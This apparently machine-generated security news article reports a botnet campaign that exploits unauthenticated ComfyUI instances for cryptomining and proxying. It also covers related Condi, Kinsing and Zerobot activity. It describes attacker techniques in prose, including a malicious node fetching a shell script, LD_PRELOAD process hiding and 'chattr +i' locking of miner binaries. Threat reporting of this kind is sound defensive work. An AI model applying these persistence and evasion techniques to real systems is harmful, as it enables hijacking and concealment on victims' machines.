Today's cybersecurity headlines are brought to you by ThreatPerspective
Ethical Hacking News

ComfyUI Botnet: A New Vector for Cryptocurrency Mining and Remote Code Execution



A new botnet campaign has emerged, targeting internet-exposed ComfyUI instances to mine cryptocurrency and conduct remote code execution. The attackers have used a purpose-built Python scanner to exploit these platforms, adding them to a cryptocurrency mining and proxy botnet. With over 1,000 publicly-accessible ComfyUI instances targeted, this threat is significant for defenders. In this article, we will delve into the details of the ComfyUI botnet and explore its tactics, techniques, and procedures.

  • ComfyUI instances are being exploited in a botnet campaign to mine cryptocurrency using various malware variants.
  • A new vector of attack has emerged, targeting internet-exposed ComfyUI instances to enlist them into a cryptocurrency mining and proxy botnet.
  • The attackers use a purpose-built Python scanner to continuously sweep major cloud IP ranges for vulnerable targets.
  • ComfyUI instances are added to two botnets: one for cryptocurrency mining (Monero and Conflux) and another for launching DDoS attacks (Hysteria V2).
  • Malicious packages have been created to fetch next-stage shell scripts, clear prompt history, and ensure persistence.
  • The attackers target specific competitors, including Hisana, and occupy their C2 port with a dummy listener.
  • Exploits of known security vulnerabilities have also been used to deploy malware variants, such as Condi and Kinsing.



    • In recent weeks, a new vector of attack has emerged in the realm of cybersecurity, targeting internet-exposed instances of ComfyUI, a popular stable diffusion platform. The attackers have created a botnet campaign that uses ComfyUI instances as a stepping stone to exploit these platforms and mine cryptocurrency using various malware variants. In this article, we will delve into the details of the ComfyUI botnet and explore its tactics, techniques, and procedures (TTPs).

    According to Censys security researcher Mark Ellzey, an active campaign has been observed targeting internet-exposed instances running ComfyUI to enlist them into a cryptocurrency mining and proxy botnet. The attackers use a purpose-built Python scanner that continuously sweeps major cloud IP ranges for vulnerable targets, automatically installing malicious nodes via ComfyUI-Manager if no exploitable node is already present.

    The attack activity systemically scans for exposed ComfyUI instances and exploits a misconfiguration that allows remote code execution on unauthenticated deployments through custom nodes. Upon successful exploitation, the compromised hosts are added to a cryptomining operation that mines Monero using XMRig and Conflux using lolMiner, as well as to a Hysteria V2 botnet. Both of these botnets are centrally managed through a Flask-based command-and-control (C2) dashboard.

    Data from the attack surface management platforms reveals that there are more than 1,000 publicly-accessible ComfyUI instances. While not an enormous number, it is sufficient for a threat actor to run opportunistic campaigns to reap financial gains.

    The attackers have also created a malicious package called "ComfyUI-Shell-Executor" to fetch a next-stage shell script ("ghost.sh") from the aforementioned IP address. Once code execution is obtained, the scanner removes evidence of the exploit by clearing the ComfyUI prompt history.

    A newer version of the scanner incorporates persistence mechanisms that cause the shell script to be downloaded every six hours and the exploit workflow to be re-executed every time ComfyUI is started. The shell script disables shell history, kills competing miners, launches the miner process, and uses the LD_PRELOAD hook to hide a watchdog process that ensures the miner process is revived in the event it gets terminated.

    Furthermore, the malware uses multiple mechanisms to ensure persistence, including copying the miner program to multiple locations and using the "chattr +i" command to lock the miner binaries and prevent them from being deleted, modified, or renamed, even by the root user.

    The attackers have also targeted a specific competitor, "Hisana", which is referenced throughout the code. The malicious package overwrites Hisana's configuration to redirect its mining output to the attacker's wallet address and occupies Hisana's C2 port with a dummy Python listener so that Hisana can't restart.

    In addition to targeting ComfyUI instances, the attackers have also exploited known security vulnerabilities to deploy various malware variants, including Condi, a Linux malware that turns compromised Linux devices into bots capable of conducting DDoS attacks. The attackers have also launched brute-force attacks against SSH servers to generate illicit cryptocurrency revenue as part of an active cryptojacking operation called Monaco.

    The discovery of the ComfyUI botnet coincides with the emergence of multiple botnet campaigns in recent weeks, including exploits of command injection vulnerabilities in n8n and Tenda AC1206 routers to add them to a Mirai-based botnet known as Zerobot. Exploitation of vulnerabilities in Apache ActiveMQ, Metabase, and React Server Components has also been observed to deliver Kinsing, a persistent malware used for cryptocurrency mining and launching Distributed Denial of Service (DDoS) attacks.

    The increase in botnet activity is associated with bots and nodes appearing in the United States. The rise is linked to the availability of source code for botnets such as Mirai. Mirai offshoots and variants are responsible for some of the largest DDoS attacks by volume.

    In conclusion, the ComfyUI botnet represents a new vector of attack that uses internet-exposed ComfyUI instances as a stepping stone to exploit these platforms and mine cryptocurrency using various malware variants. The attackers' use of persistence mechanisms and exploitation of known security vulnerabilities makes it challenging for defenders to detect and respond to this threat.



    Related Information:
  • https://www.ethicalhackingnews.com/articles/ComfyUI-Botnet-A-New-Vector-for-Cryptocurrency-Mining-and-Remote-Code-Execution-ehn.shtml

  • https://thehackernews.com/2026/04/over-1000-exposed-comfyui-instances.html

  • https://censys.com/blog/comfyui-servers-cryptomining-proxy-botnet/

  • https://www.bleepingcomputer.com/news/security/new-condi-malware-builds-ddos-botnet-out-of-tp-link-ax21-routers/

  • https://www.fortinet.com/blog/threat-research/condi-ddos-botnet-spreads-via-tp-links-cve-2023-1389

  • https://cybersecuritynews.com/new-condibot-variant-and-monaco-cryptominer/

  • https://netcrook.com/condibot-monaco-malware-network-hardware-attacks/

  • https://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces

  • https://www.tenable.com/blog/kinsing-malware-hides-itself-as-a-manual-page-and-targets-cloud-servers

  • https://fortiguard.fortinet.com/outbreak-alert/zerobot-attack

  • https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/ZeroBot!MTB


    • Published: Tue Apr 7 09:51:54 2026 by llama3.2 3B Q4_K_M


    © Ethical Hacking News . All rights reserved.

    Privacy | Terms of Use | Contact Us